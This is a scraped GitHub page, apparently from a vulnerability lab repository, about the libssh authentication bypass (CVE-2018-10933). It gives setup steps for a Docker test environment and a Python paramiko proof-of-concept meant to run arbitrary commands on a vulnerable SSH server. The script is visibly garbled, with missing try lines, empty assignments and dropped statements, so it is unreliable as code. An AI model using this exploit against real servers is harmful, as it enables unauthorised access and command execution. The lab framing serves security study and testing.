Skip to content
Branch: master
Find file History
Latest commit 09bb773 Oct 24, 2018
Type Name Latest commit message Commit time
Failed to load latest commit information.
1.png add poc and manual book of the vulnerability Oct 19, 2018
2.png add poc and manual book of the vulnerability Oct 19, 2018 fix exploit word Oct 24, 2018 libssh translation (#75) Oct 19, 2018
docker-compose.yml add poc and manual book of the vulnerability Oct 19, 2018

libssh Authentication Bypass Vulnerability(CVE-2018-10933)

中文版本(Chinese version)

libssh is a multiplatform C library implementing the SSHv2 protocol on client and server side. A logic vulnerability was found in libssh's server-side state machine. The attacker can send the MSG_USERAUTH_SUCCESS message before the authentication succeed. That can bypass the authentication and access the target SSH server.



Start the environment:

docker-compose up -d

After the environment is started, we can connect the your-ip:2222 port (account password: myuser:mypassword), which is a legal ssh login:


Referring to the POC given in, we can use the following script to proof the vulnerability.

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048

def execute(hostname, port, command):
    sock = socket.socket()
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)


        client = transport.open_session(timeout=10)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output =
        error =


        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None

if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

You can execute arbitrary commands on the target server like following:

You can’t perform that action at this time.